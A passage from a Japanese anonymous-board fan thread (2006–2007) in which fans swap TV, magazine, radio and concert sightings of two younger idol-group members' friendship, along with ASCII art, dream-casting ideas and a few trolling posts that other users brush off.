小僧「俺が一番私生活を覗いてみたいのは歪くんかな」と発言


170 :ななしじゃにー:2006/09/24(日) 16:57:32 ID:wl3qpNq7
のぞいちゃえよw
最近遊んだりしてないのかな?

171 :ななしじゃにー:2006/09/25(月) 22:38:07 ID:2uUc7Z1d
兵スペ一瞬末ズショットをぶち抜いたキャメラマンGJ!

172 :ななしじゃにー:2006/09/26(火) 00:01:27 ID:/md/aYuh
>171
滝つのときだよな?
カメラさんもそこは録画してたジャニヲタな自分もGJ!

173 :ななしじゃにー:2006/09/26(火) 01:01:50 ID:F2GLd1y6
>172
そうそう、いつの間にか隣になっててビクーリしたさ
二人ともビズよかたな、やっぱり末ズカバエエ脳(*´∀`)

174 :ななしじゃにー:2006/09/26(火) 21:45:14 ID:Jv6vgfPQ
今日のゼリー実験中、小僧に熱湯かかったとき
「(かけたの)誰?!」っつった小僧に歪が「俺」って答えた後
そのまま何も言わずにかき混ぜ再開した小僧に萌えた。
他面だったら怒るなりツッコむなりしただろうに。兄ちゃんヅラぽくてホコーリ


175 :ななしじゃにー:2006/09/26(火) 22:06:40 ID:mPo0HcSF
ノノ`∀´;ル>邪魔だろ、どう考えても!

176 :ななしじゃにー:2006/09/27(水) 00:25:36 ID:Gw69NEx2
学者さんが「計算通りです」と言ったときの
末ズの笑い方がそっくりなのがカバエエ(´Д`*)

177 :ななしじゃにー:2006/09/27(水) 02:02:11 ID:ap67qzrG
末ズは似てないのにどこか似てる。
のが最大のモヘだ。

178 :ななしじゃにー:2006/09/27(水) 15:23:18 ID:L2FDDGsH
>176
手叩くタイミングもばっちりあってるのなw

179 :ななしじゃにー:2006/09/27(水) 23:28:06 ID:JTuYwDg2
     ┃
   ,-(`・3・´)-、
  / / | ヽ \
 "⌒Y⌒Y⌒Y⌒゙
     ┃
     ┃
     J

傘で〜す。



180 :ななしじゃにー:2006/09/28(木) 18:07:35 ID:NMd3ZgP4
助勢セブンに小僧の歪おんぶ画アリ。

181 :ななしじゃにー:2006/10/03(火) 00:43:02 ID:W6s5bWA6
粗宿一発目ロケが末っ子ズで縁起が(・∀・)イイネ!!

>180
今気付いたがオマイのIDオメ!

182 :ななしじゃにー:2006/10/03(火) 15:46:26 ID:APV8rzfO
おい、オマエラ
歌藁スペの台湾リハ風景の歪と小僧に萌へたのは漏れだけか悩

肌身の時、曲終わるまでにステに来れなかった小僧に注意する歪w

183 :ななしじゃにー:2006/10/06(金) 23:05:20 ID:oqULdBfw
オリスタにおんぶ写真キタ━━(゚∀゚)━━!!!!

184 :ななしじゃにー:2006/10/07(土) 14:43:55 ID:qCuH5nwF
孫(*´∀`)

185 :ななしじゃにー:2006/10/07(土) 15:59:23 ID:vAts72EL
フナ酔い小僧の肩を抱いて覗き込む歪の急接近っぷりに(*´Д`)ハァァァン!

186 :ななしじゃにー:2006/10/07(土) 18:50:41 ID:7cq+BN5N
酒に酔ったときの介抱もあんな感じか?w

187 :ななしじゃにー:2006/10/08(日) 10:04:39 ID:sM1A+m2c
>185
ちょ、痴呆民にkwsk!

188 :185:2006/10/08(日) 15:45:56 ID:ieCuosq4
今回は(孫SPのロケの都合で)走る船の上での孫あらちトーク。
船尾に立つ5人(右から傘、ひら、既に具合の悪そうな小僧、歪、平安)。

傘「再来週OAするこの海でのロケ、平安さんどうでした?」
平安「僕は満足ですね」
歪「いや大満足でしょ、まさか!まさか!!ですよ」
ひら「まさかここまでとはねー」
傘「小僧君は」
小僧「最悪です…」(←“ハードな船酔い”のテロップ)

前の手すりに両手をつき頭を落として完全船酔い状態の小僧。
笑いの後、隣の歪が小僧の肩に禿ナツラルに腕を回して顔近づけてたw

一応心配してるのか歪?モエス




189 :ななしじゃにー:2006/10/08(日) 21:31:26 ID:sM1A+m2c
d!
想像しただけでモヘ

190 :ななしじゃにー:2006/10/10(火) 22:01:37 ID:+/67zlyy
記念真紀子

191 :ななしじゃにー:2006/10/14(土) 02:21:58 ID:5f/USmRK
ヲタ同士が仲悪いからスレがなかなか伸びないねwwwww

192 :ななしじゃにー:2006/10/14(土) 09:34:32 ID:6GaMd4pe
そんなのごく一部だろ。 自分は歪と小僧が一番好きだ。末っ子コンビが好きな奴は頻繁に壷を覗くほど暇人じゃないか、オタじゃないのが多いんでないの?

193 :ななしじゃにー:2006/10/14(土) 12:36:08 ID:OM4MGQcZ
緑と会話…

194 :ななしじゃにー:2006/10/14(土) 13:26:30 ID:MSi/XSdz
記念パピコ

195 :ななしじゃにー:2006/10/14(土) 13:28:24 ID:MSi/XSdz
↑間違えた…スマソorz

196 :ななしじゃにー:2006/10/14(土) 19:40:45 ID:5f/USmRK
どっちのヲタも馬鹿で単純で釣られやすいから
どんどん仲悪くなってくねwwwwwww

197 :ななしじゃにー:2006/10/14(土) 20:13:02 ID:UIJhxLgO
自分も2人が一番スチだ

198 :ななしじゃにー:2006/10/14(土) 21:50:20 ID:9gCga8ax
wって、アフォさが一目瞭然だからわかりやすいよね。

199 :ななしじゃにー:2006/10/14(土) 23:58:10 ID:5f/USmRK
松本ヲタ二宮ヲタは中卒ニートwwwwww
馬鹿みたな釣りでも簡単に引っかかって憎み合いwwwwww
盲目痛すぎwwwwww

200 :ななしじゃにー:2006/10/15(日) 00:22:24 ID:FOyMpoRq
>199
とりあえず、大丈夫か?

201 :ななしじゃにー:2006/10/15(日) 01:12:40 ID:MMWibFQ9
>200
頭が可哀相なヤシだろ。そっとしておいてやろう。

202 :ななしじゃにー:2006/10/15(日) 01:54:35 ID:fVJzqmTo
爆笑ww

203 :ななしじゃにー:2006/10/15(日) 05:12:31 ID:lMovDNHV
他メンヲタに嫌われてることに気づかない盲目キモヲタ2トップwwww
てめーらが嵐ヲタの質落としてんだよまだ気づかないの?wwwwwww

204 :ななしじゃにー:2006/10/15(日) 13:23:51 ID:ncTxw+mS
片目誌の横蟻の写真、もしや耳たぶかじりの瞬間か!モヘス

205 :ななしじゃにー:2006/10/15(日) 20:09:18 ID:lMovDNHV
スレ荒らされたら真っ先に疑われるのが松本ヲタ二宮ヲタwwwww
自分のスレではアンチ発見したら袋叩きなのに他メンスレにはスルーしろとかwwwwwww
頭悪いにもほどがあるwwww
さすが中卒ニート集団wwww

206 :ななしじゃにー:2006/10/15(日) 20:15:19 ID:LvoBy6JQ
小僧繋がり。

ttp://16.xmbs.jp/luvxkzxym/



207 :ななしじゃにー:2006/10/16(月) 18:50:06 ID:XfGNOfoi
なんかうるさいハエ厨房がいるな。

208 :ななしじゃにー:2006/10/16(月) 20:48:20 ID:PwCTxefy
華麗でスル

209 :ななしじゃにー:2006/10/17(火) 01:11:40 ID:sZfOQMF/
まだ直ってないです。



お兄ちゃん目線小僧…w

210 :ななしじゃにー:2006/10/17(火) 01:47:41 ID:T5l3co/8
ノシそこモヘた!何故オマイが答えるんだ小僧w反抗された事でもあるのか?

歪のチスシーンの件で小僧が食いついてたのもなんかちょっとモヘ


211 :ななしじゃにー:2006/10/17(火) 17:12:52 ID:CqhjVNcQ
そのときの顔が('Д`*)

212 :ななしじゃにー:2006/10/24(火) 00:51:39 ID:zfaSrLXH

      ┌─┐  ┌─┐              ┌─┐  ┌─┐
      │●│  │●│              │●│  │●│
      └─┤  └─┤              ├─┘  ├─┘
        ∩     ∩       にっぽん! ∩     ∩  
    (`・3・´)彡(´・∀・`)彡 (*‘◇‘)<にっぽん!ヽ.゚∀゚ノ ノノ`∀´ ル 
 ┌─┬⊂彡┌─┬⊂彡               ミ⊃┬─┐ ミ⊃┬─┐
 |●|    |●|                      |●|    |●|
 └─┘    └─┘                      └─┘    └─┘
応援応援、バレーを応援。WaTにまけるなー




213 :ななしじゃにー:2006/10/27(金) 14:12:00 ID:xEyOOg/+
孫新企画を末っ子sで早くミタス。
本気で料理対決しそうだw

214 :ななしじゃにー:2006/10/28(土) 01:14:16 ID:32rxAu0d
ノシ禿ミタス!
ガチ料理バトルもいいが子供の扱いに困る末ズも見たいな
どっちも子供苦手だろうしなw

215 :ななしじゃにー:2006/10/28(土) 02:34:12 ID:DspdrpNy
何度となく言われてきたコトだが、
末ズでデ●ノート





や ら な い か ?

つかデスノに限らず末ズのライバルものが禿ミタス

216 :ななしじゃにー:2006/10/28(土) 07:50:42 ID:diNheUUE
どっちもLで見たいんですけどどーしたらいいですか?

217 :ななしじゃにー:2006/10/28(土) 12:38:57 ID:y2uHXPt5
小僧はLじゃね?

218 :ななしじゃにー:2006/10/28(土) 14:19:16 ID:vfOwt6g7
月を傘、Lを末っ子ダブルキャストで見たい。
末っ子には全く同じ演技をさせる。

219 :ななしじゃにー:2006/10/28(土) 14:48:16 ID:KjY3NqEE
原作の二部での双子的なダヴルLを末っ子にやらせたい。
マイペースな引きこもり型Lが小僧、
一方的に小僧ライバル視のちょいキレ型が歪。
二部映像化時は是非キボン。原作読者にしか分からない話スマソ

しかしライバルって構図が本当似合うな、この二人はw

220 :ななしじゃにー:2006/10/28(土) 21:00:49 ID:3DykCMLX
>219
原作知らないがその役柄だと自分的には配役は逆がいいな。
マイペースな引きこもり型の歪、歪ライバル視のちょいキレ型な小僧。
素の二人のイメージとは逆な感じを演技で見るのもまたオツな萌えw

221 :ななしじゃにー:2006/10/28(土) 23:54:55 ID:jlxVjSFa
>歪ライバル視のちょいキレ型な小僧
>素の二人のイメージとは逆な感じ

そうでもなくね?w
G粗かなづち克服の水泳対決はけっこう
ライバル心剥き出しだったぞ>小僧w

222 :ななしじゃにー:2006/10/29(日) 00:34:21 ID:1YvttW1v
>219
見た目だけで言えばピッタシだナw敬語で猫背なコゾニアとド派手パンク系な歪メロw
最後の月とニアとの対決でコゾニアの「二人ならLを越せる」を聞いたら目汁モノだろうな
これから読む人のネタバレになったらスマソ

一部に限るならやはり歪月、小僧Lが妥当な線かな、イメージ的に。

223 :ななしじゃにー:2006/10/29(日) 01:17:17 ID:mPbi241h
L小僧はまぁ合ってると思うが、月歪はボミョン

まぁ、考えるだけでタノシスw

224 :220:2006/10/29(日) 01:49:47 ID:INcXWbhO
>221
いや、ライバル視に関しては自分もそう思う。
素の二人のイメージ云々はそれ以外のトコの事が言いたかったんだが
紛らわしい書き方してスマソ。

塚、最近禿げしく末ズモヘ不足なんだが
どうしてくれようw

225 :ななしじゃにー:2006/10/29(日) 03:56:56 ID:B/CjfUlJ
末っ子ズのドラマ共演禿ミタス。
やっぱりライバル関係がいいね。
振り返ればやつがいるのリメイクこのふたりでしてくれないかな?

226 :ななしじゃにー:2006/10/29(日) 16:44:53 ID:9LFvg7Q1
>225
振り返ればも前に挙げられてたな。
世間のイメージ的にはシバ歪とイシカワ小僧だろうけど、
本来の性格的には逆のが合うかも試練。

ま、そんなネ申ドラマが見れればどっちでもイイがw
デスノに関しては自分もLダブルキャスト希望

227 :ななしじゃにー:2006/10/29(日) 23:16:17 ID:EApJeODd
人間・失格ってのもあったな。
いじめられっ子の小僧、頭の中に蝿がいる歪w
逆パターンも可。

この2人ってどっちの役も見てみたいと思わせるところがあるな。
そしてループ話でレスしたくなるほど末っ子ズ萌え不足orz

228 :ななしじゃにー:2006/10/30(月) 00:13:18 ID:tNYQMAbn
正反対なのになーんか似てるんだよなw
イメージ通りの役でも、その逆でもツボれる自信がある
マジに何かで共演して欲しい…ニーナが企画立ててくれないだろうかw

229 :ななしじゃにー:2006/10/30(月) 00:45:28 ID:27yHjFQU
胸倉つかんでのケンカとか見てみたい!

230 :ななしじゃにー:2006/10/30(月) 07:33:44 ID:QJMKaasO
つV粗w

231 :ななしじゃにー:2006/10/30(月) 14:21:45 ID:5TWCSKBW
>230
ちょwおまwwそしてIDオメ!

232 :ななしじゃにー:2006/11/02(木) 21:20:54 ID:hFjIIhhw
テレ害のkaz●クン呼び。 ありがとうございました。

表紙、カバエエですね。

233 :ななしじゃにー:2006/11/03(金) 00:19:04 ID:M7zHYdaw
久々だよなカ〇゙呼び。モエス

234 :ななしじゃにー:2006/11/03(金) 07:50:20 ID:DXJRM1DC
自然過ぎて気づかんかったwモエス

235 :ななしじゃにー:2006/11/05(日) 02:26:18 ID:Lw76MMB3
DVD歪ピーチームは収録されてなかった脳
ちょっと期待してたんだが(´・ω・`)


236 :ななしじゃにー:2006/11/05(日) 17:27:16 ID:LzJSbQWN
歪ピーチーム禿○キだったのに、番組改編ですぐ終わって
一晩泣き明かした日の事を思い出しました。
テレビショッピングも度胸試しも面白かったよな…。

237 :ななしじゃにー:2006/11/05(日) 21:07:14 ID:B4H6HnaI
(.゚ー゚)人 ノノ`∀´ル < おれら冬ドラガンガルぜ!

238 :ななしじゃにー:2006/11/05(日) 21:41:30 ID:34Xmhtff
>235-236
自分も収録されてなくてガッカリだったが、これから続編も出るかもだし
リクしてみようジャマイカ!!

>237
同時期ってヌゲーな! 今から1月が楽しみ杉

239 :ななしじゃにー:2006/11/05(日) 22:55:57 ID:QqjpMWOP
2人一緒のドラマに出てほしかったよw

240 :ななしじゃにー:2006/11/06(月) 00:49:49 ID:+BXIfPvT
板前と御曹司w何かそれだけでモヘれる
同局じゃなくて残念だったが

241 :ななしじゃにー:2006/11/06(月) 19:51:10 ID:eiPiFuKG
英知、歪の答え欄、何で小僧が答えてるんだ?w

242 :ななしじゃにー:2006/11/08(水) 14:05:09 ID:nZKRmtsA
>>239
局を飛び越えてコラボどう。
道明寺んとこには童貞友達の正ちゃん、一平ちゃんとこにはボンが出る。
>>241
ヒントつ小僧が歪の傍でめずらしく子犬ジャレしてたから

243 :ななしじゃにー:2006/11/10(金) 21:31:53 ID:AOnatkRH
( .゚ー゚)人ノノ`∀´ル
なかよち!

244 :ななしじゃにー:2006/11/14(火) 11:03:58 ID:lFcnlY9h
韓国シークレットCDで、
小僧に激甘な歪がイイ。

245 :ななしじゃにー:2006/11/14(火) 11:31:24 ID:EgiHuaaA
>>244
kwsk!

246 :ななしじゃにー:2006/11/14(火) 12:03:37 ID:z59SwUiK
>>244
ちょ、行けなかった自分にkwsk!!

247 :ななしじゃにー:2006/11/14(火) 20:47:36 ID:plANdyv1
>244
yrsk!

248 :ななしじゃにー:2006/11/14(火) 20:51:18 ID:QnagKJgk
>>244ではないが、それはたぶん、CDのシークレットトークで国をテーマにしてお買い物ゲーム(前の人が言った国を覚えていくみたいなゲーム)をしたんだが、歪の次が小僧で、何周かして覚える国が増えてきた頃、歪が「日本」と覚え易い国を言ったことだとオモ。

つーかカンコックでは終始仲良しだったゾ。

藍喪からなので長文&改行とか変だったらスマソ。

249 :244:2006/11/14(火) 21:21:02 ID:x2e9XmPW
お待たせ&248d
小僧に激甘歪は、248が書いてくれてるお買い物ゲーム?なんだが、
何周かした後の小僧が、2つ目位の国をど忘れして、焦りまくってたところ、
歪がなんとか助けようと、あの手この手でヒント出してた。
って事を言いたかった。

250 :ななしじゃにー:2006/11/15(水) 00:56:03 ID:5Fd6fwhT
>248
>つーかカンコックでは終始仲良しだったゾ。


そこを教えて欲スィ。

251 :ななしじゃにー:2006/11/15(水) 12:19:29 ID:bDWroM0l
248だが、またまた藍喪から登場。

>>250
MC中は他メンが話してる時にマイクなしで後ろ下がって二人で話してたり、小僧がふざけたら歪が頭たたいてつっこんだりしてた。
あと、顔謝〜では、傘ラップの「墓○掘るFall」のとこで小僧と歪が顔合わせて二人で一緒に「フォー」って叫んでた。

252 :ななしじゃにー:2006/11/15(水) 18:33:20 ID:WCvFaeRb
粗宿
うさきみたいな歪君
かわいぃ

253 :ななしじゃにー:2006/11/16(木) 02:20:28 ID:pJnSyb+d
レポdd!! & ID記念!!
優しい悪魔ktkrだなw

254 :ななしじゃにー:2006/11/16(木) 17:40:17 ID:q+lzbXbS
小僧、カンフーチッスやったらしいなw
他麺はその投げチューなんだよ、と言いつつ
真似してたらしいが歪は無視だったと。
そして、2人でお化けのキューキュー車w

カ●エエよ末っ子、カ●エエよ。

255 :ななしじゃにー:2006/11/16(木) 20:32:28 ID:T9oO503D
>254
カバエ絵w
小僧は番組ちゃんと観てたんだな。

お化けきゅーきゅー車kwsk!

256 :ななしじゃにー:2006/11/17(金) 02:11:24 ID:AveWTf/A
レポd! ホッコリしますた。

>254
小僧明らかに歌藁チェックしてたなw>カンフーチッス
お化けのきゅーきゅー車kwskヨロ!!


257 :ななしじゃにー:2006/11/17(金) 10:08:14 ID:U/waqw61
>254じゃないけど、ブログのレポ(現地の友達がいるヤシ)に
公演中に2回ほど2人でヲタ芸っぽい動きをしていたとの事。
それと、他板での情報を総合すると末っ子2人で
お化けの救急車(芸人のレギュラーのネタね。)をやってたっぽい。

歪は、日本でもヲタ芸を一度もやらなかったのに…w
凱旋紺でもやってほしいな、2人に。




258 :ななしじゃにー:2006/11/17(金) 10:27:20 ID:t1OytX1x
レギュラーじゃなくてペナ○ティ

259 :ななしじゃにー:2006/11/18(土) 02:58:22 ID:MpkswNbF
末っ子二人でお化けの救急車って…
怖いけど見たい。

260 :ななしじゃにー:2006/11/18(土) 12:32:50 ID:W1GUVc3u
なーにー!お化けの救急車やったのかよwwアフォw
ちゃんと歯出して寄り目でやったんだろな。

261 :ななしじゃにー:2006/11/18(土) 13:06:11 ID:0rGswlEF
おまいペナル○ィファソ?w

262 :ななしじゃにー:2006/11/18(土) 14:48:07 ID:4q7Uhqo9
お化けの救急車ってよりも、歪が宿題クソ(化膿姉妹編)で
マスク被ってたときの動きじゃね?

263 :ななしじゃにー:2006/11/19(日) 19:09:30 ID:+6d8caSb
カンコックの紺会場で仲良くなった現地民の話なんだが、
渡韓したその日、末っ子は二人で地元で有名なタッカルビ屋へ行ったそうだ。

264 :ななしじゃにー:2006/11/19(日) 19:11:57 ID:+6d8caSb
あ、二人きりでではなく、
おそらく現地スタッフに案内してもらって、だとは思うが。

265 :ななしじゃにー:2006/11/19(日) 21:34:25 ID:wYJsRlqd
久しぶりにホッコーリしました。禿カバエエ

266 :ななしじゃにー:2006/11/22(水) 20:03:44 ID:od8AzEBT
花子見てたら無駄にモヘw

267 :ななしじゃにー:2006/12/04(月) 00:39:04 ID:NJ1Ox0Jr
パピコ!

268 :ななしじゃにー:2006/12/05(火) 13:48:58 ID:IGibBEB8
ノノ`∀´ル<俺ら仲良くしよーぜ!仲良く!

モエスw

269 :ななしじゃにー:2006/12/06(水) 13:53:25 ID:cPklK+M1
j誌、末ズ最強萌え警報が出ているようです!!

270 :ななしじゃにー:2006/12/06(水) 16:56:54 ID:FS1B18Yw
wktkなんてしてないもんね(0゚・∀・)

271 :ななしじゃにー:2006/12/06(水) 17:02:17 ID:BsSQPqkc

+   +
  ∧_∧ ∩ +
 (0゚´∀`)彡  wktk!wktk!
 (0゚∪⊂彡 +
 と__)__) +


272 :ななしじゃにー:2006/12/07(木) 08:05:58 ID:UbsU0pbm
昨夜早売り見てから、ニヤニヤ(・∀・)しすぎてずっとなぜか胃が痛いw
しかし去年の暮れの話を一年後になってサラリと言う歪の意図がワカラナス。w
小僧側からもぜひ聞きたいもんだ。

273 :ななしじゃにー:2006/12/07(木) 20:08:13 ID:ibXLJjfv
>>272
モチツケw


274 :ななしじゃにー:2006/12/08(金) 11:41:03 ID:lD1mqm0H
道明寺も一平も童貞ですかそうですか。

275 :ななしじゃにー:2006/12/11(月) 01:26:58 ID:jPkMrbJU
童貞ボーイズですね。
j誌ホッコリした。

276 :ななしじゃにー:2006/12/11(月) 21:47:36 ID:cbh43Q4b
トマ●゙トありがとうトマ●゙ト
なにげにモヘタ
見てないヤシは行ってこいyo

277 :ななしじゃにー:2006/12/11(月) 22:13:02 ID:sRroSgiW
アリガトウ、ありがとう、有難う。
て、歌じゃないよw
モヘタ

278 :ななしじゃにー:2006/12/13(水) 00:04:15 ID:IjgkneCm
ジャニウェブの岡●健一さんとこに末っ子登場
現場にいたのかw裏山w

279 :ななしじゃにー:2006/12/13(水) 17:21:58 ID:wb4HebIV
もしかして末っ子の居酒屋目撃で、
末っ子らと一緒にいたという二人のうち一人が健ちゃんさんだったとか?
健ちゃんさんなら同年代っぽく見えなくもない。

280 :ななしじゃにー:2006/12/15(金) 06:06:57 ID:dnc12aYA
2003年10月号の歩誌表紙の小僧がLな件

281 :ななしじゃにー:2006/12/15(金) 18:49:54 ID:tN/4KrNT
友達と一緒に曲を作りたいって
歪が言ってるの小僧のことかな?
作ればいいのに(0゚・∀・)

282 :ななしじゃにー:2006/12/21(木) 12:13:51 ID:1zdoeEz2
年男選抜ktkr!!

283 :ななしじゃにー:2006/12/21(木) 13:00:37 ID:HvyPN8hH
猪セブンバロスwwww

284 :ななしじゃにー:2006/12/21(木) 15:30:50 ID:nwfjZ2NJ
(蛇∀兄)y─┛~ <来年は猪ツインでコンビ紺開催

285 :ななしじゃにー:2006/12/21(木) 15:48:06 ID:PVdP+AXG
蛇兄さん!IDがっ!
是非末ズ紺お願いしたい。

286 :ななしじゃにー:2006/12/21(木) 16:46:49 ID:b7aJ3nU3
ちょww 牛紺に急に行きたくなったジャマイカ!!!



287 :ななしじゃにー:2006/12/21(木) 23:55:21 ID:2KoQib+8
>284
IDからして、言霊ケテーイでおk?
そら鼻息も荒くなりますわ!
蛇兄サンGJ!!

288 :ななしじゃにー:2006/12/21(木) 23:55:52 ID:q9cUYG/k
同人サラ仕上げ




289 :sage:2006/12/23(土) 23:00:54 ID:IrrMJrd2
タモステスペサルOP、何様と一緒に話してる歪小僧が
禿楽しそうでした

290 :ななしじゃにー:2006/12/26(火) 01:09:18 ID:oq2F7rBT
今日の粗宿なんだかモヘタw


291 :ななしじゃにー:2006/12/26(火) 01:15:54 ID:NNchR3kT
萌えどころがありすぎて言葉にできません。
ありがとうございました。

292 :ななしじゃにー:2006/12/26(火) 01:29:40 ID:Z8yOh934
ガンバレ弟とかモエが多すぎていいな

293 :ななしじゃにー:2006/12/26(火) 02:19:22 ID:Gurj0Xob
プリソ最高!

294 :ななしじゃにー:2006/12/29(金) 13:22:50 ID:ppm+ysoF
二宮junモエス

295 :ななしじゃにー:2006/12/29(金) 21:34:30 ID:lhBj0la0
>294
それ小僧の筆跡か脳w なぜ歪の名前が隣に書かれたのかワカラナスw

296 :ななしじゃにー:2006/12/30(土) 11:50:56 ID:6GUr+0NY
コゾのあこがれ

297 :ななしじゃにー:2007/01/01(月) 00:50:27 ID:oZaZ9ne9
ちょっwwwww
猪wwwww
あれだけ?wwwww

orz

298 :ななしじゃにー:2007/01/01(月) 00:55:08 ID:lMw32C0p
袴姿の末っ子カワユスw

ってことでww

299 :ななしじゃにー:2007/01/05(金) 12:09:09 ID:vFQITuti
昨日の2恥部。顔射の傘とひら、平安、歪と小僧で分かれて歌っていて
傘ひらを真似して肩くんで曲に合わせてしばらく揺れていた後、小僧が歪に頭ポンポンされてたw

300 :ななしじゃにー:2007/01/06(土) 12:26:11 ID:zMMLNPPu
嬉しそうに歪に猪の事を話す小僧が禿カバエエ

301 :ななしじゃにー:2007/01/06(土) 15:25:26 ID:TstjlhPy
おまいら芋誌は買いだぞ!!
小僧…(*´∀`*)

302 :ななしじゃにー:2007/01/06(土) 20:10:24 ID:2OF2OhQi
昨日の一恥部ですれちがうときに手にぎってたのにモエス

303 :ななしじゃにー:2007/01/07(日) 03:27:43 ID:T3clL+zH
2恥部でもやってたよ。
どちらも多分、櫻酒から肌身に行く間だったとオモ。

304 :ななしじゃにー:2007/01/07(日) 16:02:44 ID:ms6rs3H5
>303
ちょっw
あれ手握ってたの?カバエエ(´Д`*)


305 :ななしじゃにー:2007/01/07(日) 16:50:30 ID:fFjgU2RU
>300
ちょ、kwsk!!!

306 :ななしじゃにー:2007/01/07(日) 18:43:43 ID:TmZ+Iqme
>>305
300ではないが、歪ラジオで言ってた

先に猪7のことを知った小僧が、タモ駅のリハの日に物凄く嬉しそうに爆笑しながら近づいてきて、
「おめでとうございますw新しくユニットが誕生しました!w」と言ったとw
「え、何それちょっと待って。それ俺関わってんの?」と聞いたら
「ええw」と。歪は「マジふざけんなよー」と思ったそうだw

紺でも話してたらスィが。カバエエな小僧(´▽`*)

307 :ななしじゃにー:2007/01/07(日) 18:58:08 ID:qVkiQrfZ
>306
(*´Д`)ハァハァ(*´Д`)/lァ/lァ(*` Д´)//ア//ア!!:.` ;:.・∵ ゜ д:.` ;:・∵


308 :ななしじゃにー:2007/01/09(火) 10:44:32 ID:8Icvgd83
昨日の二恥部で、何の曲のときか忘れたが、
歪が小僧とすれ違いざま、
小僧の頭に手を伸ばして耳の上の髪を下から撫で上げるようにかき上げた。
恥ずかしかったのかくすぐったそうに笑う小僧に、ニヤっと歪が笑い返してて、
その一連の動作があまりに自然過ぎて、見ていた自分はビクーリし過ぎて禿げた。

309 :308:2007/01/09(火) 10:50:38 ID:8Icvgd83
○耳のうしろの髪を
×耳の上の髪を

ちなみになで上げたのは正面からだ。

310 :ななしじゃにー:2007/01/09(火) 11:59:11 ID:eJD3sPJ4
どうしたんだyo
やけに最近仲いいじゃねーか!
コノヤローw

311 :ななしじゃにー:2007/01/09(火) 15:07:29 ID:mF2A0gGf
たこやきオーラス、顔射でHGを二人でやってたよな?
やった後二人して照れてるのにモエスwww
つか、たこやき全公演であそこは必ず絡んでたよな。
『墓穴掘るフォール』の時に小僧が必ず歪んとこ行って、歪になんかやらせようとしてたw


312 :ななしじゃにー:2007/01/12(金) 10:19:09 ID:6WS/MvZu
コンビニ行ったら…
小僧表紙のテレ害と歪のFI●Eが仲良く並んでて思わず。
両方お持ち帰りした自分が通りますよ。

313 :ななしじゃにー:2007/01/12(金) 12:50:26 ID:2FjMstN9
どいつもこいつも林檎なのがワロス

314 :ななしじゃにー:2007/01/12(金) 17:27:54 ID:se+hu2ll
>313
林檎繋がり確かにワロスw

315 :ななしじゃにー:2007/01/16(火) 00:50:36 ID:YhzF497R
蛇店のライヌフォトktkr!
必見だぞw

316 :ななしじゃにー:2007/01/16(火) 00:56:35 ID:D427TLow
>>315
mjdk!
kwsk!

317 :ななしじゃにー:2007/01/16(火) 08:20:27 ID:YhzF497R
>316
顔射の>299のシーン(?)w

318 :ななしじゃにー:2007/01/16(火) 18:41:29 ID:Kw4oEDi+
>317
ちょ、禿見たいYO!!!!!

今日のニッキGJ! キャーキャーしてヒャーヒャーで、アルシンドになるんだなww

319 :ななしじゃにー:2007/01/16(火) 21:45:01 ID:VX1NVko/
>318
早くキャーキャーヒャーヒャーしてアルシンドになりたいw

320 :ななしじゃにー:2007/01/16(火) 22:54:47 ID:/E/NlLtF
アルシンドになちゃうよーて事は
小僧は禿げ上がるほど萌えた、って事ですか?

321 :ななしじゃにー:2007/01/17(水) 14:54:10 ID:+CkKjjzX
テレ害のちっさい紺写真にモヘ

322 :ななしじゃにー:2007/01/17(水) 15:51:03 ID:f4iJsKNi
>321
ノシノシ
カバエエ…(´Д`*)

323 :ななしじゃにー:2007/01/18(木) 17:38:42 ID:cFuksAb7
+@ct、2人の背中合わせカ●゙エエw

324 :ななしじゃにー:2007/01/18(木) 18:17:15 ID:2xZVR3Si
>>323
ノシ

325 :ななしじゃにー:2007/01/19(金) 02:39:27 ID:v8t9YH1F
最近、またひっつきもっつきだな…。

326 :ななしじゃにー:2007/01/20(土) 13:29:55 ID:nfymudSt
来週、末っ子ズ晩御飯キタ━━━━━━(゚∀゚)━━━━━━!!!!!

327 :ななしじゃにー:2007/01/20(土) 15:51:37 ID:IdQEtWai
>326
来週末っ子s晩ご飯禿しくwktk!!!!
久々だよな、2人のロケ!

328 :ななしじゃにー:2007/01/20(土) 17:25:51 ID:h/yafcA/
去年の3月以来?wktk超。

329 :ななしじゃにー:2007/01/20(土) 19:40:03 ID:wjAxMTad
  ∧_∧
 (*`∀´) ワクワク
oノ∧つ⊂)
( (*.゚∀゚) テカテカ
∪( ∪ ∪
 と_)_)

330 :ななしじゃにー:2007/01/20(土) 19:45:42 ID:60/Jk9O5
>329
ハァ━━━━━━ *´Д`* ━━━━━━ン!!!


331 :ななしじゃにー:2007/01/21(日) 17:11:51 ID:Z4Qim3+d
歪が注目してるハリウッド俳優は小僧なんだってさw

332 :ななしじゃにー:2007/01/21(日) 17:18:11 ID:hEeAS/Ex
>331
kwsk

333 :ななしじゃにー:2007/01/21(日) 18:19:45 ID:Z4Qim3+d
>342
立ち読みだからあんま覚えてないけど、
雑誌SCR●ENで注目してるハリウッド俳優は?って質問に
「それこそ小僧ですよw」とサラッと答えてたのにモヘ。
当然ジョニを押すとオモてたからいきなり小僧の名前で吹いたw(その後ジョニも出してたが)
小ネタでスマソ

334 :ななしじゃにー:2007/01/22(月) 13:06:56 ID:wdeFw1MG
>333
ハフンw(*´Д`)

335 :ななしじゃにー:2007/01/22(月) 15:02:47 ID:Jv3XewMY
電波入らないから聞けないが、
この間の小僧ラジオは歪くん特集だったそうだなw
聞けた人裏山

336 :ななしじゃにー:2007/01/22(月) 16:24:38 ID:rWpb2ZIP
>335
気になってしまうジャマイカ!!www

337 :ななしじゃにー:2007/01/22(月) 16:44:16 ID:IKnA5dSb
小僧ラジオ…

338 :ななしじゃにー:2007/01/22(月) 19:30:18 ID:+HNCzx1F
>335
それ聞いたよ
W/MEと映画曲とドラマ曲と歪関係の曲流してた

339 :ななしじゃにー:2007/01/22(月) 20:59:15 ID:oq9jd1Ly
戎には僕芋のポスターがいっぱいあるから
それを見に行くだけでも楽しいよね、とも言っておりました。

小僧、d!

340 :ななしじゃにー:2007/01/26(金) 16:42:44 ID:nnJldr9+
ID記念ハピコ!

341 :ななしじゃにー:2007/01/26(金) 16:46:28 ID:nnJldr9+
ハピコって何だ、ハピコって…orz

パピコ買いに逝ってきます

342 :ななしじゃにー:2007/01/27(土) 00:26:41 ID:oUsYPYpF
明日がwktk過ぎるwwww
今から正座しますノシ

343 :ななしじゃにー:2007/01/27(土) 09:52:47 ID:4KpYopFo
>342
wktk超ノシ 
末s姐さん達見逃すなよ!! 次はいつあるか分からないからなw

